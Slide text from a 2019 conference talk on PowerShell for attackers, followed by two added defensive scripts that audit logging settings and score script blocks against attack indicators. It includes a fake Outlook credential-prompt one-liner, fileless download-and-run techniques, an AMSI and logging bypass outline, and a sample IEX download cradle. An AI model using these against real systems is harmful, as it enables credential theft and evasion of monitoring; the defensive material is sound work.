Powershell-hacking-Y1nTh35h311-BSidesTLV2019


My talk on 10 tips for PowerShell as a hacking tool @ BsidesTLV 2019 - Session code on https://github.com/YossiSassi/PowerShell-Hacking-BSidesTLV



  1. PowerShell as a hacking tool 2019 – Yossi Sassi, White h^t hacker & InfoSec Researcher (yossi_sassi)
  2. Whoami – Y1nTh35h3ll
     • ~30 years of keyboard access & guitar playing
     • Researcher, White h^t hacker (Finance, Military/Gov)
     • Co-Founder @ CyberArt, Board Member @ Javelin Networks
     • AD Protector, Pow3r5he11 consultant/trainer, CISSP, etc…
  3. What we'll talk about
     • 10 tips (out of gazillion..) for PS for hackers
     • Some of our cool research ;)
  4. What is PowerShell?
     • Perceived as "MS shell for IT/Sys admins"
       – For hackers it's a totally different story ;)
     • CMD "on steroids"
     • Windows LotL heaven
     • Ideal for post-exploitation
     • Runs on Windows/Linux/macOS, open source
     • Based on .NET fx, works with objects
  5. Tip 1 – Invoke/Execute any text stream
     • Run in-memory without touching disk (fileless)
     • IE (non-visible)
     • msxml2
     • Net.WebClient
     • Invoke-WebRequest (aliases: curl, wget, iwr)
  6. Tip 2 – Harness the power of .NET
     • [Net.WebUtility]::UrlEncode("/insider profiles/")
     • ("heLlo wOrld").ToCharArray() | % { [char]::IsUpper($_) }
     • [convert]::ToBase64String($([System.Text.Encoding]::Unicode.GetBytes("shutdown /r /t 0")))
  7. Tip 3 – Convert any to any
     • Xml, json, html, bytes, whatever.
     • Export/Import, ConvertTo/From
  8. Tip 4 – Phish admin creds one-liner
     • $c = $Host.UI.PromptForCredential("Microsoft Outlook","Please enter your credentials","$env:userdomain$env:username","")
     • Can expand it to Windows.Security.Credentials.UI (see @Dviros CredLeaker)
  9. Under the .NET framework hood…
  10. Tip 5 – There is no spoon…
     • PowerShell.exe is just a spoon; System.Management.Automation runs the show
     • Run PowerShell (code) without PowerShell(.exe)
     • Run PowerShell from a binary without running the binary process
  11. Tip 6 – Run C# directly, local & remote
     • Add-Type
     • Utilize $using, ${function:functionName} to deliver ANY local variables & functions to remote sessions
  12. Tip 7 – Get objects from apps/scripts
     • Convert any string output to customized objects
       – Intuitive, no RegEx
     • In-mem (on the fly) or template file
  13. Tip 8 – Multiple encodings, compression, buffers, threads, shellcode…
     • Prepare advanced payloads
     • Investigate PowerShell attacks
  14. But.. what about PowerShell defenses??
     • Execution Policies (signed scripts)
     • Script Block Logging
     • Module Logging
     • Transcriptions
     • ConstrainedLanguage
     • Protected Event Logging *
     • + AMSI
  15. Tip 9 – (Un)Protected Event Logging
     • Think "ransomware" for event logs ;)
     • Leverage PS defense w/CMS for the Red team
  16. Tip 10 – Total bypass of PS defenses
     • Based on research by Omer Yair & team
       – Bypass AMSI / Logging / Auditing with Invisi-Shell
     • Does not require administrative privileges(!)
       – ICLRProfiling::AttachProfiler()
       – COR_PROFILER_PATH environment variable
     • Gets JIT-ed code address
     • Hooks PowerShell (System.Management.Automation), hooks System.Core.dll, hooks all calls to AMSI
       – No hook functions – simple replace with RET opcode
     • Detaches after hooks are placed
  17. Key Takeaways
     • PowerShell Rocks!
     • PS Blue Team defenses exist
       – Use/Lose PS v2.0 wherever possible
     • Or use Invisi-Shell
       – Obfuscate vs. look for potentially malicious activity (IEX, .DownloadString, TOKEN_ADJUST_PRIVILEGES etc.)
     • For Windows + Automation = ultimate choice
       – Writing payloads is fun! And robust.
       – Multiple PowerShell offensive frameworks can be found online
  18. Links & THANKS!
     – Dor Amit (co-founder @ CyberArtSecurity.com)
     – Omer Yair (EndPoint Team Lead @ Symantec TDAD)
     – Team @ Javelin Networks (nowadays Symantec TDAD)
     – Omer's talk in last DerbyCon
       • https://www.youtube.com/watch?v=Y3oMEiySxcc
       • … CHECK HIM OUT this upcoming DefCon @ main stage!
     • https://github.com/YossiSassi
  19. Thanks! Yossi_Sassi
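The defenses listed on slide 14 (Execution Policy, Script Block Logging, Module Logging, Transcription, ConstrainedLanguage, Protected Event Logging) can be audited and switched on from PowerShell itself. The script below is an added example, not code from the talk or from the linked repository. It assumes a Windows host and uses the policy registry keys that Group Policy writes for these settings; the function names Get-PowerShellDefenseStatus and Enable-PowerShellDefense are chosen here, the Enable function needs an elevated session, and C:\PSTranscripts is a placeholder directory.

```powershell
# Added example, not from the talk: audit the PowerShell defenses from slide 14 on the local host
# and optionally turn them on through the policy registry keys Group Policy writes.
# Assumes a Windows host; Enable-PowerShellDefense needs an elevated session.

$PolicyRoot = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows'

# One row per registry-backed defense: the policy key, the DWORD that enables it, and
# where a SOC should expect the resulting evidence to show up.
$Defenses = @(
    [pscustomobject]@{ Name = 'Script Block Logging';    Key = "$PolicyRoot\PowerShell\ScriptBlockLogging";  Value = 'EnableScriptBlockLogging';    Evidence = 'Microsoft-Windows-PowerShell/Operational, Event ID 4104' }
    [pscustomobject]@{ Name = 'Module Logging';          Key = "$PolicyRoot\PowerShell\ModuleLogging";       Value = 'EnableModuleLogging';         Evidence = 'Event ID 4103 pipeline execution details' }
    [pscustomobject]@{ Name = 'Transcription';           Key = "$PolicyRoot\PowerShell\Transcription";       Value = 'EnableTranscripting';         Evidence = 'text transcripts under OutputDirectory' }
    [pscustomobject]@{ Name = 'Protected Event Logging'; Key = "$PolicyRoot\EventLog\ProtectedEventLogging"; Value = 'EnableProtectedEventLogging'; Evidence = '4104 payloads stored as CMS envelopes' }
)

function Get-PowerShellDefenseStatus {
    foreach ($d in $Defenses) {
        $current = $null
        if (Test-Path -Path $d.Key) {
            $current = (Get-ItemProperty -Path $d.Key -Name $d.Value -ErrorAction SilentlyContinue).($d.Value)
        }
        [pscustomobject]@{ Defense = $d.Name; Enabled = ($current -eq 1); Where = $d.Key; Evidence = $d.Evidence }
    }
    # Two checklist items from the same slide that are not policy DWORDs.
    $policy = Get-ExecutionPolicy -Scope LocalMachine
    [pscustomobject]@{
        Defense  = 'Execution Policy (LocalMachine)'
        Enabled  = ($policy -in 'AllSigned', 'RemoteSigned')
        Where    = "Get-ExecutionPolicy -List (currently $policy)"
        Evidence = 'governs .ps1 files only; not a security boundary'
    }
    [pscustomobject]@{
        Defense  = 'ConstrainedLanguage (this session)'
        Enabled  = ($ExecutionContext.SessionState.LanguageMode -eq 'ConstrainedLanguage')
        Where    = '$ExecutionContext.SessionState.LanguageMode'
        Evidence = 'Add-Type and arbitrary .NET method calls are refused'
    }
}

function Enable-PowerShellDefense {
    # Enables the three logging defenses. Protected Event Logging is skipped because it also
    # needs an encryption certificate, which is out of scope for this example.
    [CmdletBinding(SupportsShouldProcess = $true)]
    param(
        # Assumption: a directory whose ACL stops the logged users from editing their own transcripts.
        [string]$TranscriptDirectory = 'C:\PSTranscripts'
    )
    foreach ($d in $Defenses | Where-Object Name -ne 'Protected Event Logging') {
        if ($PSCmdlet.ShouldProcess($d.Key, "Set $($d.Value) = 1")) {
            New-Item -Path $d.Key -Force | Out-Null
            Set-ItemProperty -Path $d.Key -Name $d.Value -Value 1 -Type DWord
        }
    }
    # Module logging is inert until at least one module name is listed; '*' covers all modules.
    $moduleNames = "$PolicyRoot\PowerShell\ModuleLogging\ModuleNames"
    if ($PSCmdlet.ShouldProcess($moduleNames, 'Log all modules')) {
        New-Item -Path $moduleNames -Force | Out-Null
        New-ItemProperty -Path $moduleNames -Name '*' -Value '*' -PropertyType String -Force | Out-Null
    }
    # Transcripts need a destination; the invocation header records who ran what and when.
    $transcription = "$PolicyRoot\PowerShell\Transcription"
    if ($PSCmdlet.ShouldProcess($transcription, "OutputDirectory = $TranscriptDirectory")) {
        Set-ItemProperty -Path $transcription -Name 'OutputDirectory' -Value $TranscriptDirectory
        Set-ItemProperty -Path $transcription -Name 'EnableInvocationHeader' -Value 1 -Type DWord
    }
}

# Usage: audit first; then Enable-PowerShellDefense -WhatIf previews the registry writes.
Get-PowerShellDefenseStatus | Format-Table -AutoSize
```

Execution Policy is listed for completeness only; as the Enabled column's note says, it stops unsigned .ps1 files from running and nothing else, so the logging rows are the ones that matter for detection. Protected Event Logging is deliberately left to a separate step, since without the decryption key on the SIEM side the CMS envelopes mentioned on slide 15 are unreadable to the defender as well.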
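Slide 17 recommends looking for potentially malicious activity such as IEX, .DownloadString and TOKEN_ADJUST_PRIVILEGES rather than trying to out-obfuscate the attacker, and Script Block Logging (slide 14) is what makes that text visible in Event ID 4104. The function below is an added example, not code from the talk: it scores script block text against those indicators plus others the deck mentions elsewhere (Net.WebClient and the download aliases from slide 5, base64-encoded commands from slide 6, the COR_PROFILER environment variables from slide 16). The function name Find-SuspiciousScriptBlock and the weights are assumptions, and the sample blocks are constructed for the example.

```powershell
# Added example, not from the talk: triage Script Block Logging text (Event ID 4104)
# against the indicators named in the deck. Runs offline on constructed samples;
# the commented tail shows how to feed real events on a host with logging enabled.

# Indicator table: a name, a regex (-match is case-insensitive by default) and a triage weight.
$Indicators = @(
    [pscustomobject]@{ Name = 'Invoke-Expression'; Weight = 3; Pattern = '\b(iex|invoke-expression)\b' }
    [pscustomobject]@{ Name = 'Remote download';   Weight = 3; Pattern = '\.downloadstring\(|\.downloaddata\(|net\.webclient|invoke-webrequest|\b(iwr|curl|wget)\b' }
    [pscustomobject]@{ Name = 'Encoded command';   Weight = 2; Pattern = '(^|\s)-e(nc|ncodedcommand)?\s+[a-z0-9+/=]{20,}|frombase64string' }
    [pscustomobject]@{ Name = 'Token privileges';  Weight = 2; Pattern = '\btoken_adjust_privileges\b|adjusttokenprivileges' }
    [pscustomobject]@{ Name = 'CLR profiler env';  Weight = 3; Pattern = 'cor_enable_profiling|cor_profiler' }
)

function Find-SuspiciousScriptBlock {
    param(
        [Parameter(Mandatory = $true)][string]$ScriptBlockText,
        [string]$Source = '<inline>'
    )
    # Collect every indicator whose pattern occurs in the block.
    $hits = foreach ($i in $Indicators) {
        if ($ScriptBlockText -match $i.Pattern) { $i }
    }
    if (-not $hits) { return }   # nothing matched: emit no finding
    [pscustomobject]@{
        Source     = $Source
        Score      = ($hits | Measure-Object -Property Weight -Sum).Sum
        Indicators = ($hits.Name -join ', ')
        Preview    = $ScriptBlockText.Substring(0, [Math]::Min(80, $ScriptBlockText.Length))
    }
}

# Constructed sample script blocks standing in for the ScriptBlockText of 4104 events.
$Samples = @{
    'benign-inventory' = 'Get-Service | Where-Object Status -eq Running | Export-Csv C:\temp\svc.csv'
    'download-cradle'  = 'IEX (New-Object Net.WebClient).DownloadString("http://example.invalid/a.ps1")'
    'encoded-launcher' = 'powershell -nop -w hidden -enc QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB'   # placeholder base64
    'profiler-env'     = '$env:COR_ENABLE_PROFILING=1; $env:COR_PROFILER_PATH="C:\temp\x.dll"'
}

# The benign block produces no row; the other three are ranked by score.
$Samples.GetEnumerator() |
    ForEach-Object { Find-SuspiciousScriptBlock -ScriptBlockText $_.Value -Source $_.Key } |
    Sort-Object Score -Descending | Format-Table -AutoSize

# On a host with Script Block Logging on, replace the samples with real events.
# Properties[2] of a 4104 record is the ScriptBlockText field.
# Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-PowerShell/Operational'; Id = 4104 } |
#     ForEach-Object { Find-SuspiciousScriptBlock -ScriptBlockText $_.Properties[2].Value -Source $_.RecordId }
```

Two points worth keeping in mind when running this against real logs. Long script blocks are split across several 4104 events, so a cradle can straddle two records; group by ScriptBlockId (Properties[3]) before matching if the split rate is high. And the -enc pattern is a coarse proxy: a 4104 event for an encoded command contains the decoded text, so the stronger signal is the decoded block itself matching the other rows.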
